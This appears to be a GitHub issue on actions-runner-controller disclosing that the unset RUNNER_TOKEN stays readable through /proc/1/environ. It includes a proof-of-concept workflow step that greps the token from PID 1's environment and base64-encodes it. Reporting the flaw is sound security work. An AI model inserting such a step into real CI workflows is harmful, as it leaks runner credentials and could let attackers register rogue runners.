### ISSUE TITLE
RUNNER_TOKEN is accessible from workflows running on the host

### ISSUE THREAD

**Issue by SharpEdgeMarshall** [actions/actions-runner-controller#2871]
Currently `RUNNER_TOKEN` is protected from exfiltration using `unset` [here](https://github.com/actions/actions-runner-controller/blob/master/runner/startup.sh#L161) after registering the agent but this doesn't prevent the secret from being leaked by accessing the parent process environ `/proc/1/environ`

```
jobs:
  printenv:
    name: printenv
    runs-on: [self-hosted]
    steps:
      - run: |
          grep --binary-files=text RUNNER_TOKEN /proc/1/environ | base64 -w 0
```
